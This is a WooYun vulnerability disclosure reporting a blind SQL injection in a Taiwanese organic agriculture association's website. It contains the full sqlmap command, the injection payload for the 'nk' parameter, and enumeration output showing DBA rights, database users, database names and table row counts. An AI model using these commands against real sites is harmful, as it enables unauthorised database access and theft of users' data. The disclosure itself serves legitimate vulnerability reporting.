当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154709

漏洞标题:中華有機農業協會主站存在SQL植入漏洞(DBA權限+543萬用戶名用戶Key等日誌泄露)(臺灣地區)

相关厂商:中華有機農業協會

漏洞作者: 路人甲

提交时间:2015-11-22 10:38

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-22: 细节已通知厂商并且等待厂商处理中
2015-11-25: 厂商已经确认,细节仅向厂商公开
2015-12-05: 细节向核心白帽子及相关领域专家公开
2015-12-15: 细节向普通白帽子公开
2015-12-25: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

本協會建立「台灣特供食品」標章的目的,是希望把好的產品推薦給想要健康的消費大眾,末學從事有機產品認證工作近20多年,了解有良心的農戶從事有機或GAP栽培的辛苦,更知道社會大眾都想吃到安心的食品,然而,辛苦栽培的生產者不知客戶在那裡?想要吃安心食品的消費者不知去那裡買?更不用說其他問題了。為了這些問題,去年我們把「中華有機農業協會」轉換成為諮詢輔導單位,用來整合資源並建立兩岸有機PGS產銷聯盟,我們會提出一系列的辦法,包括:方案策略丶操作方式丶農場管理丶農友培訓丶認證辦法丶消費者監督機制丶溯源管理系統、后市場管理丶電子商務丶兩岸物流丶國際商貿丶多國認證.....等等,我們希望廣大消費大德能站出來,讓我們每人出一點點力量,依循IFOAM的理念做出對自己及社會大眾健康有益的公益事業。請相信我們自己,我們一定能做得到的。以上報告

详细说明:

地址:http://**.**.**.**/main/CN/news.php?T=S&nk=DHJAYA9HN8MM&tk=FGWMN7BSFTAA

python sqlmap.py -u "http://**.**.**.**/main/CN/news.php?T=S&nk=DHJAYA9HN8MM&tk=FGWMN7BSFTAA" -p nk --technique=B --random-agent --batch -D Aftsc --count


back-end DBMS: Microsoft SQL Server 2000
Database: Aftsc
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| dbo.WorkLog                    | 5433900 |
Table: WorkLog
[9 columns]
+----------+----------+
| Column   | Type     |
+----------+----------+
| Content  | ntext    |
| ID       | int      |
| LggKey   | nchar    |
| OrganKey | nchar    |
| Summary  | nvarchar |
| UserKey  | nchar    |
| UserName | nvarchar |
| WorkIp   | nvarchar |
| WorkTime | datetime |
+----------+----------+


漏洞证明:

---
Parameter: nk (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: T=S&nk=DHJAYA9HN8MM' AND 9495=9495 AND 'eFEJ'='eFEJ&tk=FGWMN7BSFTAA
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.28
back-end DBMS: Microsoft SQL Server 2000
current user:    'php'
current user is DBA:    True
database management system users [9]:
[*] BUILTIN\\Administrators
[*] php
[*] rs
[*] sa
[*] siwang
[*] TFLogin
[*] transfriend_cn
[*] yunlin
[*] zhcert
database management system users password hashes:
[*] php [1]:
    password hash: NULL
[*] rs [1]:
    password hash: NULL
[*] sa [1]:
    password hash: NULL
[*] siwang [1]:
    password hash: NULL
[*] TFLogin [1]:
    password hash: NULL
[*] transfriend_cn [1]:
    password hash: NULL
[*] yunlin [1]:
    password hash: NULL
[*] zhcert [1]:
    password hash: NULL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: nk (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: T=S&nk=DHJAYA9HN8MM' AND 9495=9495 AND 'eFEJ'='eFEJ&tk=FGWMN7BSFTAA
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.28
back-end DBMS: Microsoft SQL Server 2000
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: nk (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: T=S&nk=DHJAYA9HN8MM' AND 9495=9495 AND 'eFEJ'='eFEJ&tk=FGWMN7BSFTAA
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.28
back-end DBMS: Microsoft SQL Server 2000
available databases [10]:
[*] Aftsc
[*] aftsc2
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] transfriend_cn
[*] yunlin
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: nk (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: T=S&nk=DHJAYA9HN8MM' AND 9495=9495 AND 'eFEJ'='eFEJ&tk=FGWMN7BSFTAA
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.28
back-end DBMS: Microsoft SQL Server 2000
current database:    'Aftsc'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: nk (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: T=S&nk=DHJAYA9HN8MM' AND 9495=9495 AND 'eFEJ'='eFEJ&tk=FGWMN7BSFTAA
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.28
back-end DBMS: Microsoft SQL Server 2000
Database: Aftsc
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| dbo.WorkLog                    | 5433900 |
| dbo.Show_ProductScheme         | 64204   |
| dbo.JobItemMethod              | 45738   |
| dbo.D141129_Job                | 44297   |
| dbo.JobKey                     | 22910   |
| dbo.PlanKey                    | 19132   |
| dbo.ProductScheme              | 17125   |
| dbo.ExamineeKey                | 15379   |
| dbo.ProduceJob                 | 15102   |
| dbo.Show_DataName              | 13951   |
| dbo.MultiLogin                 | 10702   |
| dbo.V_ProductScheme            | 8882    |
| dbo.V_ProductScheme_Item       | 7940    |
| dbo.StuffProviderKey           | 7638    |
| dbo.D141129_Plan               | 6477    |
| dbo.Show_ProduceTCA            | 6104    |
| dbo.StuffSource                | 5863    |
| dbo.zTemp_pName2TWMOOLOONZHCER | 5839    |
| dbo.D141129_Label              | 4499    |
| dbo.ProcessManage              | 4185    |
| dbo.TCADetail                  | 4077    |
| dbo.D141129_Apply              | 3952    |
| dbo.zTemp_pName2ENMOOLOONZHCER | 3929    |
| dbo.Material                   | 3499    |
| dbo.ApplyLabelDetail           | 3194    |
| dbo.LabelDraw                  | 3181    |
| dbo.Show_Examinee              | 3158    |
| dbo.ProductLgg                 | 3093    |
| dbo.ApplyLabel                 | 2983    |
| dbo.ProducePlan                | 2966    |
| dbo.Glebe                      | 2720    |
| dbo.ProductName                | 2636    |
| dbo.D141129_TCA                | 2539    |
| dbo.SysMsg                     | 2488    |
| dbo.JobItem                    | 2382    |
| dbo.NewsList                   | 2283    |
| dbo.JobMaterial                | 2097    |
| dbo.V_Farm_UserList            | 1594    |
| dbo.ProduceTCA                 | 1526    |
| dbo.ProductImg                 | 1501    |
| dbo.UserList                   | 1432    |
| dbo.JobStuffSource             | 1381    |
| dbo.U_ProductKindName          | 1258    |
| dbo.ProductMap                 | 1255    |
| dbo.v_ProductName_Key          | 1255    |
| dbo.v_ProductName              | 1254    |
| dbo.ProductKind1_Material      | 1230    |
| dbo.Show_Register              | 1102    |
| dbo.ClientList                 | 955     |
| dbo.Farm                       | 900     |
| dbo.Examinee                   | 854     |
| dbo.StuffProviderCer           | 833     |
| dbo.ProductKind1_JobItem       | 813     |
| dbo.JobMethod                  | 652     |
| dbo.ProcessStatus              | 585     |
| dbo.V_Used_ProductKey          | 561     |
| dbo.StuffProvider              | 521     |
| dbo.RightLgg                   | 494     |
| dbo.zTemp_NKAOHGBZDHEA         | 452     |
| dbo.zTemp_NJ93EKBVW6MA         | 450     |
| dbo.zTemp_NJ96XHBYX9KA         | 450     |
| dbo.zTemp_NJ9SZHBZ8DLA         | 450     |
| dbo.V_Used_ItemKey             | 422     |
| dbo.ProduceSale                | 382     |
| dbo.ProductLevel               | 365     |
| dbo.ProductKind3               | 339     |
| dbo.CodeTable2                 | 338     |
| dbo.Certificate                | 312     |
| dbo.CodeTable                  | 298     |
| dbo.RightTable                 | 247     |
| dbo.U_RightCodeName            | 247     |
| dbo.LggCode                    | 234     |
| dbo.ProcessItem                | 216     |
| dbo.zTemp_E_F_G_MOOLOONZHCER   | 198     |
| dbo.RightLevel                 | 185     |
| dbo.ProductKind1_JobMethod     | 184     |
| dbo.sysconstraints             | 162     |
| dbo.ProcessMain                | 156     |
| dbo.OrganListKey               | 149     |
| dbo.ProductKind                | 137     |
| dbo.DownFiles                  | 133     |
| dbo.zTemp_NJ96XHBYXALA         | 118     |
| dbo.zTemp_NJ9IKKBQ4LNA         | 118     |
| dbo.zTemp_NKA2EGBPTFEA         | 118     |
| dbo.zTemp_NKAOHGBZDIEA         | 118     |
| dbo.V_Used_MaterialKey         | 117     |
| dbo.IntroType                  | 106     |
| dbo.NewsType                   | 94      |
| dbo.NewsImg                    | 86      |
| dbo.ProductKind2               | 84      |
| dbo.IntroList                  | 78      |
| dbo.LabelSale                  | 76      |
| dbo.Log_DBUpdate               | 75      |
| dbo.RightTree                  | 70      |
| dbo.Criterion                  | 68      |
| dbo.SiteLink                   | 63      |
| dbo.V_Used_MethodKey           | 63      |
| dbo.DownType                   | 55      |
| dbo.ListForm                   | 55      |
| dbo.zTemp_E_F_G_LKJIHGFEDCBA   | 43      |
| dbo.OrganLgg                   | 37      |
| dbo.DBVersion                  | 35      |
| dbo.JobDocType                 | 31      |
| dbo.ProductKind1               | 28      |
| dbo.ListType                   | 25      |
| dbo.V_Used_CodeKey             | 22      |
| dbo.ValidateType               | 21      |
| dbo.IntroImg                   | 20      |
| dbo.SysCode                    | 20      |
| dbo.KindJobMap                 | 19      |
| dbo.ListField                  | 19      |
| dbo.Trademark                  | 18      |
| dbo.Principal                  | 17      |
| dbo.V_Used_OrganKey2           | 17      |
| dbo.LggTable                   | 16      |
| dbo.OrganList                  | 14      |
| dbo.JobItemMaterial            | 13      |
| dbo.QualityType                | 11      |
| dbo.RightCode                  | 10      |
| dbo.ApplyBlankOut              | 9       |
| dbo.RegTempTable               | 9       |
| dbo.V_Used_MaterialKey3        | 9       |
| dbo.V_Used_OrganKey            | 9       |
| dbo.zTemp_pName2TWLKJIHGFEDCBA | 9       |
| dbo.ProcessScheme              | 8       |
| dbo.LabelPrint                 | 7       |
| dbo.zTemp_pName2CNLKJIHGFEDCBA | 7       |
| dbo.JobDocList                 | 6       |
| dbo.ProduceDoc                 | 6       |
| dbo.V_Used_TrademarkKey        | 5       |
| dbo.V_Used_LggKey2             | 4       |
| dbo.RepineType                 | 3       |
| dbo.syssegments                | 3       |
| dbo.ValidateDoc                | 3       |
| dbo.ValidateList               | 3       |
| dbo.ProcessAnnex               | 2       |
| dbo.StuffSourceAnnex           | 2       |
| dbo.V_Used_LggKey              | 2       |
| dbo.QualityList                | 1       |
| dbo.TCAAnnex                   | 1       |
| dbo.zTemp_NJ9N49APTRDO         | 1       |
+--------------------------------+---------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: nk (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: T=S&nk=DHJAYA9HN8MM' AND 9495=9495 AND 'eFEJ'='eFEJ&tk=FGWMN7BSFTAA
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.28
back-end DBMS: Microsoft SQL Server 2000
Database: Aftsc
Table: WorkLog
[9 columns]
+----------+----------+
| Column   | Type     |
+----------+----------+
| Content  | ntext    |
| ID       | int      |
| LggKey   | nchar    |
| OrganKey | nchar    |
| Summary  | nvarchar |
| UserKey  | nchar    |
| UserName | nvarchar |
| WorkIp   | nvarchar |
| WorkTime | datetime |
+----------+----------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-11-25 16:04

厂商回复:

這個是台灣公司網站,IP地址和聯絡方法都是台灣,到請聯絡 TWNCERT 處理

最新状态:

暂无

漏洞评价:

评价